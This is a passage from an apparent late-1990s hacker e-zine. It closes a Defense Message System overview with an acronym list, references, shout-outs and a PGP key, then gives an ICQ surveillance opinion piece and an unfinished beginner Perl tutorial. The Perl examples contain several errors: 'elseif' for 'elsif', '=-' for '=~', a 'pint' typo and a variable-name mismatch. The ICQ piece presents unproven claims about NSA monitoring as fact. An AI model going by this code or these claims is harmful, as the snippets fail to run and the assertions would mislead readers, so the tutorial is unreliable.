  3898. The DMS Guard is used in the end-state DMS architecture to permit the
  3899. exchange of Secret DMS messages over an Unclassified backbone by protecting
  3900. the connection to the Unclassified backbone and by performing a check on all
  3901. outgoing messages to ensure that they were encrypted. The Guard also checks
  3902. to see if the message originator and/or recipients can send and/or receive
  3903. messages from a system-high enclave. In the SBU solution set, the Guard will
  3904. permit the exchange of Unclassified DMS messages between the Secret enclave
  3905. and an Unclassified enclave.
  3906.    
  3907. Firewalls
  3908. *********       
  3909. The typical firewall ensures that only authorized message packets and service
  3910. requests are allowed to pass through the firewall. The firewall will protect
  3911. LANs, NIPRNET, Internet, or modem attack by blocking direct access to
  3912. unauthorized users. In addition to maintaining access controls to the
  3913. network, the firewall will maintain extensive audit records detailing both
  3914. successful and unsuccessful attempts to access the system.
  3915.    
  3916. Certification Authority Workstation (CAW)
  3917. *****************************************
  3918. The CAW is used to manage DMS X.500 certificates and program FORTEZZA
  3919. cryptographic cards with a user's security profile, including security
  3920. certificates, credentials and cryptographic key. The CA uses an
  3921. Administrative Directory User Agent (ADUA) to post the public portion of the
  3922. user's certificate to the Directory. Within the Coast Guard, it's expected
  3923. that CA duties will primarily be performed by the traditional CMS Custodian.
  3924.    
  3925. Organizational Registration Authority Workstation (ORAW)
  3926. ********************************************************
  3927. The ORAW is a COTS workstation used by the Organizational Registration
  3928. Authority (ORA) at individual commands to assist the CA in the FORTEZZA card
  3929. management process. The ORAW enables the ORA to gather and format user
  3930. information for electronic submission to the CA in order to register the
  3931. user. This user information consists of the user's distinguished name (unique
  3932. DMS user name), release authorizations (e.g., organizational message,
  3933. individual message), and classification level (e.g., SBU, Secret). The ORAW
  3934. cannot sign user security certificates.
  3935. <----
  3936.  
  3937. Acronyms and abbreviations.
  3938. ***************************
  3939. ACP-120 NATO classified X.400 message operation
  3940. ACP-123 Common Messaging Strategy & Procedures (X.400 Military Messaging)
  3941. ADNET Anti-Drug Network
  3942. ADUA Administrative Directory User Agent
  3943. API Application Programming Interface
  3944. ASC AUTODIN Switching Center
  3945. AUTODIN Automatic Digital Network
  3946. BAH Booz, Allen & Hamilton - Government Contractor
  3947. BMTA Backbone Message Transfer Agent
  3948. C3I Command, Control, Communications & Intelligence
  3949. C4I Command, Control, Communications, Computers & Intelligence
  3950. CA Certificate Authority
  3951. CAMS Communication Area Master Station (USCG)
  3952. CAP Component Approval Process
  3953. CARD Cost Analysis Requirements Document
  3954. CAW Certificate Authority Workstation
  3955. CCB Communications Configuration Board
  3956. CGDN Coast Guard Data Network (56Kbps backbone)
  3957. CGDN+ Coast Guard Data Network Plus (T1 backbone)
  3958. CGISS Coast Guard Intelligence Support System
  3959. CKL Compromised Key List
  3960. CMS Communications Security Material System
  3961. CN Common Name
  3962. CNO Chief, Naval Operations
  3963. COMDT Commandant USCG
  3964. COMSEC Communications Security
  3965. COTS Commercial Off-The-Shelf
  3966. CRL Certificate Revocation List
  3967. CS2K COMMSYS 2000 (USCG TISCOM)
  3968. CSSAMPS Classified Standard Semi-Automated Message Processing System
  3969. CTOS Convergent Technologies Operating System (SW-II)
  3970. DAA Designated Approving Authority
  3971. DAG DMS Advisory Group
  3972. DAP Directory Access Protocol
  3973. DAPP Defense AUTODIN Phase Out/DMS Phase In Plan
  3974. DIA Defense Intelligence Agency
  3975. DIB Directory Information Base
  3976. DISA Defense Information Systems Agency
  3977. DISN Defense Information Systems Network
  3978. DISP Directory Information Shadowing Protocol
  3979. DIT Directory Information Tree
  3980. DL Distribution List
  3981. DMS Defense Message System
  3982. DN Distinguished Name
  3983. DNS Distinguished Name Server
  3984. DON Department of the Navy
  3985. DRB Discrepancy Review Board
  3986. DSA Directory System Agent
  3987. DSP Directory System Protocol
  3988. DSS Digital Signature Standard
  3989. DSCS Defense Satellite Communications System
  3990. DUA Directory User Agent email Electronic Mail
  3991. EC/EDI Electronic Commerce/Electronic Data Interchange
  3992. ECP Emergency Command Precedence
  3993. EFA Engineering Field Activity
  3994. EI&A Enhanced Identification & Authentication
  3995. EOS Element of Service
  3996. ESL Enterprise Solutions, Ltd. (contractor)
  3997. EXM Enterprise eXtended Mail
  3998. FAMIS Fleet Automated Messaging Interface System
  3999. FFC Fortezza for Classified
  4000. FORTEZZA Personal credit card sized encryption device
  4001. FSP Functional Security & Performance (testing)
  4002. G/G Gate Guard
  4003. G-SCT Commandant, USCG Telecommunications Branch
  4004. GCC Global Control Center
  4005. GCCS Global Command & Control System
  4006. GCSS Global Combat Support System
  4007. GDS Global Directory Service
  4008. GENSER General Service (U, C, S, T)
  4009. GUI Graphic User Interface
  4010. HD Help Desk
  4011. HP Hewlett Packard
  4012. IDUA Integrated Directory User Agent
  4013. IEM Information Exchange Meeting
  4014. IG Implementation Group
  4015. IMTA Intermediate Message Transfer Agent
  4016. INE In-Line Network Encryption
  4017. IOC Initial Operational Capability
  4018. IOT&E Initial Operational Test & Evaluation
  4019. IP Internet Protocol
  4020. IPMS InterPersonal Message Service (P22 format)
  4021. IPT Integrated Process Team
  4022. IPWG Implementation Planning Working Group
  4023. ISO International Standards Organization
  4024. ISSO Information Systems Security Officer
  4025. ISWG Integrated Security Working Group
  4026. ITDS Information Transfer Distribution System
  4027. JANAP Joint Army Navy Air Force Publication
  4028. JMCISS
  4029. JWICS Joint Worldwide Intelligence Communication System
  4030. KEA Key Encryption Algorithm
  4031. KMID Key Material Identifier
  4032. KP Key Processor (LMD/KP)
  4033. LAN Local Area Network
  4034. LANTAREA Commander Atlantic Area USCG
  4035. LAT Logistics Action Team
  4036. LCC Local Control Center
  4037. LDAP Local Directory Access Protocol
  4038. LMD Local Management Device (LMD/KP)
  4039. LMFS Lockheed Martin Federal Systems
  4040. MADMAN Mail & Directory Management
  4041. MAFB Maxwell Air Force Base
  4042. MAISRC Major Acquisition Information Systems Review Committee
  4043. MAN Metro Area Network
  4044. MARCORPSYSCOM Marine Corps Systems Command
  4045. MCEB Military Communications Electronics Board
  4046. MCS Message Conversion System
  4047. MDT Message Distribution Terminal
  4048. MEK Message Encryption Key
  4049. MFG Multi-Function Gateway
  4050. MFI Multi-Function Interpreter
  4051. MHS Message Handling System
  4052. MIB Management Information Base
  4053. MIME Multi-purpose Internet Mail Extensions
  4054. MISSI Multi-Level Information System Security Initiative
  4055. ML Mail List
  4056. MLA Mail List Agent
  4057. MLS Multi-Level Security
  4058. MM Military Message
  4059. MMHS Military Message Handling System
  4060. MMS Multi-Level Mail Server
  4061. MPRS Message Prep & Review Software (USCG)
  4062. MROC Multi-Command Required Operational Characteristics
  4063. MS Message Store
  4064. MSP Message Security Protocol
  4065. MTA Message Transfer Agent
  4066. MTDS Message Transfer Distribution System
  4067. MTS Message Transfer System
  4068. MWS Management Work Station
  4069. NAVCOMPARS Naval Communications Processing & Routing System
  4070. NAVMACS Navy Modular Automated Communications System
  4071. NAVMACS II Navy Modular Automated Communications System 2nd Generation
  4072. NCP-II Naval Communications Processing & Routing System 2nd Generation
  4073. NCTAMS Naval Computer & Telecommunications Area Master Station
  4074. NCTC Naval Computer & Telecommunications Command
  4075. NCTS Naval Computer & Telecommunications Station
  4076. NDN Non Delivery Notice
  4077. NDR Non Delivery Report
  4078. NIPRNET Non-classified Internet Protocol Routed NETwork
  4079. NISE East Naval In Service Engineering East
  4080. NOVA NSA developed Message Handling System
  4081. NSA National Security Agency
  4082. NSANET National Security Agency Network
  4083. NSAP Network Service Access Point
  4084. NSM Network Security Manager
  4085. NSS Network Security System
  4086. O Operational Immediate Precedence
  4087. O/R Originator/Recipient
  4088. OA Operational Assessment
  4089. OLE Object Linking & Embedding
  4090. OM Operations Manager
  4091. OPWG Operations Planning Working Group
  4092. ORA Organizational Registration Authority
  4093. ORAW Organizational Registration Authority Work Station
  4094. OSC Operations Systems Center (USCG, Martinsburg, WV)
  4095. OSD(C3I) Office of the Secretary of Defense for Command, Control &
  4096. Communications
  4097. OT&E Operational Test & Evaluation
  4098. OU Organizational Unit
  4099. P Priority Precedence
  4100. P772 Military Message Format
  4101. PAA Policy Approving Authority
  4102. PACAREA Commander Pacific Area USCG
  4103. PCA Policy Creation Authority
  4104. PCMCIA Personal Computer Memory Card International Association
  4105. PDU Protocol Data Unit
  4106. PIN Personal Identification Number
  4107. PLA Plain-Language Address
  4108. PMO Program Management Office
  4109. PMSS Program Management Support System (Database)
  4110. PN Personal Name
  4111. POM Program Operating Memorandum
  4112. POP Point of Presence
  4113. PRMD Private Management Domains
  4114. PUA Profiling User Agent
  4115. R Routine Precedence
  4116. RCC Regional Control Center
  4117. RCDB Routing & Configuration Database
  4118. RCP Resource Change Proposal
  4119. RDN Relative Distinguished Name
  4120. RI Routing Indicators
  4121. ROMC Required Operational Messaging Characteristics
  4122. S/A Service Agency
  4123. SA System Administrator
  4124. SBU Sensitive But Unclassified
  4125. SCI Sensitive Compartmented Information
  4126. SCIF Sensitive Compartmented Information Facility
  4127. SDA System Design Architecture
  4128. SDN Secure Data Network (USCG Dial-up via STU-III)
  4129. SEC Single Enabling Capability
  4130. SEMCOR Government Contractor
  4131. SEWG System Evolution Working Group
  4132. SHA Security Hash Algorithm
  4133. SIMWHG Special Intelligence Message Handling Working Group
  4134. SIPRNET Secret Internet Protocol Routed NETwork
  4135. SMS Service Management System
  4136. SMTA Subordinate Message Transfer Agent
  4137. SMTP Simple Mail Transfer Protocol
  4138. SNMP Simple Network Management Protocol
  4139. SNS Secure Network Server
  4140. SO Security Officer
  4141. SPAWAR Space & Naval Warfare Systems Command
  4142. SRA Sub-Registration Authority
  4143. SSAMPS Standard Semi-Automated Message Processing System
  4144. ST&E Security Test & Evaluation
  4145. STU-III Secure Telephone Unit 3rd Generation
  4146. SW-II CG Standard Work Station II
  4147. SW-III CG Standard Work Station III
  4148. TAIS Target Architecture & Implementation Strategy
  4149. TCC Telecommunications Center
  4150. TCP/IP Transport Control Protocol/Internet Protocol
  4151. TEWG Test & Evaluation Working Group
  4152. TIIWG Transition Implementation & Integration Working Group
  4153. TISCOM Telecommunication & Information Systems Command (USCG)
  4154. TT Trouble Ticket
  4155. TWG Tactical Working Group
  4156. UA User Agent
  4157. UNIX Common Operating System
  4158. USAF U. S. Air Force
  4159. USCG U. S. Coast Guard
  4160. USMC U. S. Marine Corps
  4161. USMTF U. S. Message Text Format
  4162. USN U. S. Navy
  4163. VPN Virtual Private Network
  4164. W Critic Precedence
  4165. WAGB Icebreaker (USCG)
  4166. WAN Wide Area Network
  4167. WHEC High Endurance Cutter (USCG)
  4168. WinNT Windows NT Operating System (SW-III)
  4169. WMEC Medium Endurance Cutter (USCG)
  4170. X.400 Messaging Message Handling System Standard
  4171. X.500 Directory Directory System Standard
  4172. Y Emergency Command Precedence (ECP)
  4173. Z Flash Precedence
  4174.  
  4175. References & Source Material
  4176. **************************** 
  4177. U. S. Navy DMS Master Plan 
  4178. U. S. Navy DMS Transition Plan 
  4179. U. S. Coast Guard DMS Transition Plan 
  4180. Lockheed Martin Federal Systems (LMFS) DMS Product Guide 
  4181. U. S. Navy DMS Ordering Guide 
  4182. DMS System Design Architecture (SDA) 
  4183. http://www.disa.mil/
  4184. http://fmpweb.nctsw.navy.mil/manual/ManolAUTODIN.htm
  4185. http://www.andrews.af.mil/89cg/789cs/System_Flight/autodin.htm
  4186. http://www.periscope.ucg.com/terms/t0000059.html
  4187. http://www.periscope.usni.com/demo/terms/t0000059.html
  4188. http://www.cio.dla.mil/dms/AUTODIN.htm
  4189. http://199.209.74.26/mastats.htm
  4190. http://www.ld.com/cbd/archive/1995/01(January)/24-Jan-1995/Dawd001.
  4191. http://www.af.mil/news/Jan1999/n19990115_990057.html
  4192. http://www.daas.dla.mil/daashome/daasc_dars.htm
  4193. http://daynt2.daas.dla.mil/daasc_dars.htm
  4194. ----------
  4195.  
  4196. Shouts to D4RKCYDE 9X and B4B0.    
  4197. http://darkcyde.system7.org        
  4198. http://hybrid.dtmf.org             
  4199. http://b4b0.org
  4200. http://ninex.com
  4201.  
  4202. hybrid@dtmf.org
  4203.  
  4204. -----BEGIN PGP PUBLIC KEY BLOCK-----
  4205. Version: PGPfreeware 5.0i for non-commercial use
  4206. Comment: I Encrypt, Therefore I Am
  4207.  
  4208. mQGiBDcmQEIRBADLSAfM5KwPJKl6pjNLhB5PGyehHssAxao11b9P9pA7WbIoEdlT
  4209. 0/tqCnwhIZie27Z8VPai/mOe7Ges6KVW111DTmdvYGMzomoz1Tb/XPWyF57FD07m
  4210. slCNI/gjcg4VJLmPasNAAoFCyJLu0+gM/tEu3JgmTWwM8nFFEWMoXhIuVwCg/37z
  4211. iBOJuwozilmVdqlpULL+DZEEAKHDxv9crox12xpVJSPokmfrpXKOnDp/xRYB826u
  4212. D4FiXloyrW3ass2ui03DX8oICUucDSz1l8kzxeJkKuPgliHNqsyRi1BEtkvDr2c9
  4213. MTG6BaNlV0saAIu93/mhBZI6opdCtRmxOTdN903dyguGMIM8/Hmo6YHKc6lrXtSH
  4214. 7DQBBAC+enBy9fAn+DvUW+3139YMnrU/Z1Buw9o702NaKBO5jUd0ZCq9xXQ2wU0/
  4215. mZFOgpcYaHsYAFuQ2UGFDMCE221dpAA3QxkqgnE2aePBme7UJyIMILVHH22wk1mP
  4216. F2GIChpUx5kccWKSS2tR4b8xQxWgKcil0YPxRyNa810MJucjGbQbaHlicmlkIDx0
  4217. aDBybkBjb2xkbWFpbC5jb20+iQBLBBARAgALBQI3JkBCBAsDAQIACgkQDiWdSLnM
  4218. lmm4gQCg7OgBUmDMYyixphbmV+nWAUsGQh4An2kjLIGFEBfNafuIwBFTWYp1jEiK
  4219. uQQNBDcmQHIQEAD5GKB+WgZhekOQldwFbIeG7GHszUUfDtjgo3nGydx6C6zkP+NG
  4220. lLYwSlPXfAIWSIC1FeUpmamfB3TT/+OhxZYgTphluNgN7hBdq7YXHFHYUMoiV0Mp
  4221. vpXoVis4eFwL2/hMTdXjqkbM+84X6CqdFGHjhKlP0YOEqHm274+nQ0YIxswdd1ck
  4222. OErixPDojhNnl06SE2H22+slDhf99pj3yHx5sHIdOHX79sFzxIMRJitDYMPj6NYK
  4223. /aEoJguuqa6zZQ+iAFMBoHzWq6MSHvoPKs4fdIRPyvMX86RA6dfSd7ZCLQI2wSbL
  4224. aF6dfJgJCo1+Le3kXXn11JJPmxiO/CqnS3wy9kJXtwh/CBdyorrWqULzBej5UxE5
  4225. T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/c
  4226. dlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaCl
  4227. cjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD
  4228. 8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZ
  4229. yAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6z3WFwACAhAA
  4230. 3IzDKaB+m0crl53scR4x7BIvwxmd5RuEPQxtxUdRi3KvSCeVlT+jVNi6alTgLRPX
  4231. 8h9Q5YURP055kr8giNqJohk4j5yyNczzjdOfODRj4ewCiQ7imekh9XTeSUbzdJ84
  4232. hH1tcp8FmP/fNftBhatRx0UaM83RBB7V/2Dp3iCcFJWgDWB/I839G1s4KbTSORXd
  4233. mYb6J1JLV/MXGD0iqLkzoxgEOPn/w97DQTP/AsgbZJiL9kaXVvWRWrJ7MUvldx9e
  4234. 98kAdAIUeN7rdUSU93PXSMdFccP7Aw+BMib9j65y40q1y5NYowt32Xbcc4hUMAXe
  4235. aew1jhL/nz+tforS/FwnNsd2NhJ80xHM0kQHoyta3ALBWZyCujjlLtfv+ifkqTP7
  4236. 6sBlHRbt/50CNZwefYjhA7KQMSVmDCxxXW7LgHngLsGMo+UvI6PMIBWwcfkXmwmy
  4237. vmXJtlAWMRBRGvFR2mokjbdlo0p0aJBXe8LhXEM5URsgybRObhVSX6HlkP1wUjBW
  4238. HR7GEVbWwPb1d2SpfYcPJjV3XJH1eYmnlTaNlrxGiG9MLaabz11GNRhRQvfmVcQj
  4239. xFV/Ed452lIyLAPQkla4gbUg8IekKRU9EUWBPiPjbWzPlRyogaZXbhwfUuVlDabC
  4240. yACdX+eIjlS3/LI6tbxtewdBjJXQsDwawpC5wMaum1aJAD8DBRg3JkBzDiWdSLnM
  4241. lmkRAihxAKDCvgy46FH8VWZloqKREL21hLLqFQCgjjvBTLL2I36EaySUzFjEZ4PY
  4242. Oy4=
  4243. =Netg
  4244. -----END PGP PUBLIC KEY BLOCK-----
  4245.  
  4246.  
  4247. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  4248. -->]OO[:[ ICQ Conspiracy ]::::::::::::[OO--[ by camel ]---[ ]::::::::::::::::
  4249. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  4250.  
  4251. The ICQ Conspiracy
  4252. By Camel
  4253.  
  4254. Most of us have heard of or used the Internet communication program called
  4255. ICQ.  For those of us who have not, it is a client that has chat, email and
  4256. other functions built-in.  What started my suspicion of this program is that
  4257. everybody has their own number. Unlike IRC where servers, hosts, nicknames
  4258. and other such things are ever changing...  ICQ has a constant. On IRC a law
  4259. enforcement agency would have to use a lot of resources and effort to get to
  4260. you, such as contacting a server in order to log your chat session.  A change
  4261. is about to undergo in our government, which will require all corporate CIO's
  4262. to obtain a top-level security clearance.  They claim it will help reinforce
  4263. our nations' technologies security infrastructure.  To me it sounds like a
  4264. way for the government to control these technology companies who create
  4265. hardware and other such technologies as Internet communication tools, e.g.,
  4266. ICQ.
  4267.  
  4268. Normally, if an agency were to gather intelligence of a suspect under
  4269. investigation and wanted to go about it by logging his/her Internet data,
  4270. they would have to go through some serious action and obtain something like a
  4271. court order.  With this new rule in place, any government official who has
  4272. the power to do so could order the company to create a backdoor, or something
  4273. of the sort, in a program and the company would have to keep their mouth
  4274. shut.
  4275.  
  4276. It is no secret that the NSA and other such agencies monitor information over
  4277. Internet connections, but you might _not_ have known that there are
  4278. applications that were purposely made to gather information about a user and
  4279. even grab files from your computer.  One non-classified example that could be
  4280. considered a form of this is known as Enterprise Information Portals.  These
  4281. are applications that enable companies to unlock internally and externally
  4282. stored information, and provide users a single gateway to personalized
  4283. information needed to make informed business decisions.  Try replacing the
  4284. word "business" with "investigation" and see what you come up with.
  4285.  
  4286. Now, why ICQ?  I already stated that a constant is much easier to monitor and
  4287. log than a variable.  In addition, ICQ has several normally completely
  4288. different communication methods all in one.  What is even _better_ is all of
  4289. you people using ICQ are Tagged and Numbered for easy tracking. Okay, so
  4290. what?  The NSA knows my ICQ number is 1777849, if I choose to communicate
  4291. something incriminating or very personal I will just create another
  4292. account... right?  Sure, go ahead.  But it is also no big secret that
  4293. individual computers give out 'personalized' information which if they logged
  4294. you once, they _know_ exactly what to look for and could find your new
  4295. account with a scan of some sort.
  4296.  
  4297. Well, fuck me sideways!  Hey, this wont happen until they change that
  4298. security clearance thing will it?  Well, the NSA scans every telephone,
  4299. Internet, radio and satellite communication in the world for things of
  4300. interest such as "terrorism".  The government regularly invades your privacy
  4301. and what you thought were your rights every single day.  You make the call.
  4302. I have not uncovered some super secret conspiracy, I have no proof.  It just
  4303. seems logical that with all these methods of surveillance _proven_ to exist,
  4304. I would definitely take advantage of ICQ's 'features'.
  4305.  
  4306. With all this in mind... do you trust _your_ ICQ??
  4307.  
  4308.  
  4309. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  4310. -->]OO[:[ Perl Programming ]:::::[OO--[ by z0mba ]---[ zomba@addicts.org ]:::
  4311. -->[OO]:::::::::::::::::::::::::::::::[ http://members.xoom.com/phuk ]:::::::
  4312.  
  4313.  
  4314. Okay, so I was sitting there wondering what the hell I could write an article
  4315. about and came up with two things, Perl Programming and Setting up an FTP 
  4316. Server under Linux. I will try and get both these files into f41th 7 but if I
  4317. can't then Setting up an FTP Server *will* appear in f41th 8. Anyways, 0n w1f
  4318. d4 ph1l3...
  4319.  
  4320. Please note: when I start talking in m4d h4x0r t4lk, it is for the benefit of
  4321. the lamers that read f41th who are trying to skool themselves cos I know they
  4322. just don't understand it otherwise.
  4323.  
  4324.  
  4325. Introduction
  4326. ------------
  4327.  
  4328. Perl stands for Practical Extraction and Report Language and is one of the
  4329. favourite scipting languages for *nix platforms. If you've never come across 
  4330. perl code before then it is similar in syntax to C, but with the style of 
  4331. UNIX shell scripting. Along with that it contains all of the best features 
  4332. of every other programming language you've eva used (4nd y3s 1 kn0w 4ll j3w 
  4333. l4m3rs h4v3 n3v3r us3d 4ny pr0gr4mm1ng l4ngu4g3s b4, but j3w w1ll h4v3 t0 
  4334. t4k3 my w0rd f0r 1t).
  4335.  
  4336. Perl is an interpreted language rather than a compiled one (th4t m34ns th4t 
  4337. 34ch st4t3m3nt 1s tr4nsl4t3d 1nt0 s0urc3 c0de 0n3 4t 4 t1m3 4s 3x3cut10n 
  4338. pr0c33ds r4th3r th4n th3 3nt1re pr0gr4m 4ll 4t 0nc3 l1k3 4 c0mp1l3d 0n3), 
  4339. which can be either an advantage or a disadvantage whichever way you look at 
  4340. it. Perl has been ported to virtually every operating system out there, and 
  4341. most Perl programs will run un-modefied on any system that you move them to.
  4342. This is definately an advantage. Its also very useful for all those trivial
  4343. day-to-day tasks that you don't want to have to write in C and compile.
  4344.  
  4345. The good thing about Perl is that its very forgiving as far as things like 
  4346. declaring variables, allocating and deallocating memory, and variable types, 
  4347. so you can actually get down to the business of writing the code. In fact, 
  4348. those concepts don't actually exist in Perl, this results in programs that
  4349. are short and to the point, while similar programs writtn in C might spend
  4350. half the code just declaring the variables.
  4351.  
  4352.  
  4353. A Simple Perl Program
  4354. ---------------------
  4355.  
  4356. To get you started in the absolute basics of Perl programming, here is a 
  4357. very trivial Perl program:
  4358.  
  4359. #!/usr/bin/perl
  4360. print "the man from Del Monte, he say f41th 0wnz j3w\n";
  4361.  
  4362. Thats it, simple ain't it. Type that in, save it to a file called 
  4363. delmonte.pl, chmod +x it, and then execute it, simplicity itself.
  4364.  
  4365. If by any chance you are familier with shell scripting languages (n0, 1m 
  4366. n0t t4lk1ng t0 j3w l4m3rs, 1 kn0w y0u d0n't c0d3), this will look very 
  4367. familier. Perl basically combines the simplicity of shell-scripting with 
  4368. the powah of a fully-fledged programming language. The first line of the 
  4369. program indicates to OS where to find the perl interpreter, this is standard 
  4370. procedure with shell scripts.
  4371.  
  4372. If /usr/bin/perl is not the correct location for Perl on your system, you 
  4373. can find out where it is located by typing "which perl" at the command line.
  4374. If j3w do not have Perl installed you might want to go to www.perl.com and
  4375. get it.
  4376.  
  4377. The second line does exactly what is says - it prints the text enclosed in 
  4378. the quotes. The \n is used for a new line character.
  4379.  
  4380.  
  4381. Perl Variables and Data Structures
  4382. ----------------------------------
  4383.  
  4384. Unlike most programming languages, Perl doesn't have the concept of data-type
  4385. (integer, string, char, etc), but it does have several kinds of variable.
  4386.  
  4387. Scalar variables, indicated as $variable, are interpreted as numbers or 
  4388. strings, as the context warrents. You can treat a variable as a number one 
  4389. moment and a string the next if the value of the variable makes sense in that
  4390. context. There is a large collection of special variables in Perl, such as
  4391. $_, $$ and $<, which Perl keeps track of, and you can use if you want to. ($_
  4392. is the default input variable, $$ is the process ID, and $< is the user ID).
  4393. As you become more familier with Perl, you will probably find yourself using
  4394. these variables, and people will accuse you of writing "read-only" code.
  4395.  
  4396. Arrays, indicated as @array, contain one or more elements, which can be 
  4397. referred to by index. For example, $names[12] gives me the 13th element in 
  4398. the array @names. (its important to remember that numbering starts with 0).
  4399.  
  4400. Associative arrays, indicated by %assoc_array, store values that can be
  4401. referenced by key. For example, $days{Feb} will give me the element in the
  4402. associative array %days that corresponds with Feb.
  4403.  
  4404. The following line of Perl code lists all the elements in an associative
  4405. array (the foreach construct will be covered later in the phile).
  4406.  
  4407. foreach $key (keys %assoc){
  4408.      print "$key = $assoc{$key}\n"};
  4409.  
  4410.  
  4411. NOTE: $_ is the "default" variable in Perl. In this example, the loop 
  4412. variable is $_ because none was specified.
  4413.  
  4414.  
  4415. Conditional Statements: if/else
  4416. -------------------------------
  4417.  
  4418. The syntax of a Perl if/else structure is as follows:
  4419.  
  4420. if (condition) {
  4421.      statement(s)
  4422.      }
  4423. elseif (condition) {
  4424.      statement(s)
  4425.      }
  4426. else {
  4427.      statement(s)
  4428.      }
  4429.  
  4430. condition can be any statement or comparison. If a statement returns any true
  4431. value, the statement(s) will be executed. Here, true is defined as:
  4432.  
  4433.      o--> any nonzero number
  4434.      o--> any nonzero string; that is, any string that is not 0 or empty
  4435.      o--> any conditional that returns a true value.
  4436.  
  4437. For example, the following piece of code uses the if/else structure:
  4438.  
  4439.  
  4440. if ($favorite eq "d4rkcyde") {
  4441.       print "Yes, d4rkcyde 0wnz.\n"
  4442.      }
  4443. elseif ($favourite eq "PLUK") {
  4444.       print "NO!, PLUK is l4m3 as sh1t.\n";
  4445.      }
  4446. else {
  4447.      print "Your favorite grewp is $favorite.\n"
  4448.      }
  4449.  
  4450.  
  4451. Okay I can tell by now that your pretty impressed wif my uber el8 Perl tekniq
  4452. and to be honest, I don't blame j3w one bit, now lets get on with some more
  4453. in-depth topics.
  4454.  
  4455. Looping
  4456. -------
  4457.  
  4458. Perl has four looping constructs: for, foreach, while, and until.
  4459.  
  4460. for
  4461. ---
  4462.  
  4463. The for construct performs a statement (or set of statements) for a set of
  4464. conditions defined as follows:
  4465.  
  4466. for (start condition; end condition; increment function) {
  4467.      statement(s)
  4468.      }
  4469.  
  4470. At the beginning of the loop, the start condition is set. Each time the loop
  4471. is executed, the increment function is performed until the end condition is 
  4472. achieved. This looks much like the traditional for/next loop. The following
  4473. code is an example of a for loop:
  4474.  
  4475. for ($i=1; $i<=10; $i++) {
  4476.       print "$i\n"
  4477.       }
  4478.  
  4479. foreach
  4480. -------
  4481.  
  4482. The foreach construct performs a statement (or set of statements) for each 
  4483. element in a set, such as a list or array:
  4484.  
  4485. foreach $name (@names) {
  4486.      print "$name\n"
  4487.      }
  4488.  
  4489. while
  4490. -----
  4491.  
  4492. while performs a block of statements while a particular condition is true:
  4493.  
  4494. while ($x<10) {
  4495.      print "$x\n";
  4496.      $x++;
  4497.      }
  4498.  
  4499. until
  4500. -----
  4501.  
  4502. until is the exact opposite of the while statement. It will perform a block
  4503. of statements while a particular condition is false - or, rather, it becomes
  4504. true:
  4505.  
  4506. until ($x>10) {
  4507.      print "$x\n";
  4508.      $x++;
  4509.      }
  4510.  
  4511.  
  4512. Regular Expressions
  4513. -------------------
  4514.  
  4515. Perl's greatest strength is in its text and file manipulation. This is 
  4516. accomplished by using the regular expression (regex) library. Regexes allow
  4517. complicated pattern matching and replacement to be done efficiently and
  4518. easily. For example, the following one line of code will replace every
  4519. ocurrence of the string 'eleet' or the string 'k-rad' with the string 'lame'
  4520. in a line of text:
  4521.  
  4522. $string =- s/eleet|k-rad/lame/gi;
  4523.  
  4524. Without going into too much depth, the following table should explain what
  4525. this line actually means:
  4526.  
  4527.     
  4528.     $string =-      [ Performs this pattern match on the text found in the ]
  4529.               [ varibale called $string.                             ]
  4530.  
  4531.     s          [ Substitute.                                          ]
  4532.  
  4533.     /          [ Begins the text to be matched.                       ]
  4534.  
  4535.     eleet|k-rad      [ Matches the text eleet and k-rad. Something to       ]
  4536.               [ to remember though is its looking for the text eleet ]
  4537.               [ and not the word eleet, so it will also match the    ]
  4538.               [ text eleet in eleethax0r.                            ]
  4539.  
  4540.     /          [ Ends text to be matched, begin text to replace it.   ]
  4541.  
  4542.     lame          [ Replaces anything that was matched with the text lame]
  4543.  
  4544.     /          [ Ends replace text.                                   ]
  4545.  
  4546.     g          [ Does this substitution globally; that is, wherever in]
  4547.               [ the string you match the match text (and any number  ]
  4548.                 [ of times), replaces it.                              ]
  4549.  
  4550.     i          [ The search text is case-insensitive. It will match   ]
  4551.               [ eleet, Eleet, or ElEeT.                              ]
  4552.  
  4553.     ;          [ Indicates the end of the line code.                  ]
  4554.  
  4555.  
  4556. You might think that replacing a string of text with another is quite a 
  4557. simple task but the code needed to do that same thing in another language 
  4558. such as C, is mad big.
  4559.  
  4560.  
  4561. Access to the Shell
  4562. -------------------
  4563.  
  4564. Perl is very useful for admin functions because, for one thing, it has access 
  4565. to the shell. This means that any process that you might ordinarily do by
  4566. typing commands to the shell, Perl can do for you. This is done with the ``
  4567. syntax; for example, the following code will print a directory listing:
  4568.  
  4569. $curr_dir = `pwd`;
  4570. @listing = `ls -la`;
  4571. pint "Listing for $curr_dir\n";
  4572. foreach $file (@listing) {
  4573.      print "$file";
  4574.      }
  4575.  
  4576. NOTE: the `` notation uses the backtick found above the tab key, not the 
  4577. single quote. Thought i'd mention that cos a few people don't even know it 
  4578. exists (j3w kn0w wh0 j3w 4r3).
  4579.  
  4580. Access to the command line is pretty common in shell scripting languages but
  4581. is less common in higher level programmning languages.
  4582.  
  4583.  
  4584. Command-Line Mode
  4585. -----------------
  4586.  
  4587. In addition to writing programs, Perl can be used from the command line like
  4588. any other shell scripting language. This enables you to smack up Perl 
  4589. utilities on-the-fly, rather than having to create a file and execute it.
  4590. For example, running the following command line will run through the file
  4591. foo and replace every occurence of the string k-rad with el8, saving a 
  4592. back-up copy of the file at foo.bak:
  4593.  
  4594. perl -p -i.bak -e s/k-rad/el8/g foo
  4595.  
  4596. The -p switch causes Perl to perform the command for all files listed (in
  4597. this case, just one file). The -i switch indicates that the file specified
  4598. is to be edited in place, and the original backed up with the extension
  4599. specified. If no extension is supplied, no backup copy is made. The -e switch
  4600. indicates that what follows is one or more lines of a script.
  4601.  
  4602.  
  4603. Automation Using Perl
  4604. ---------------------
  4605.  
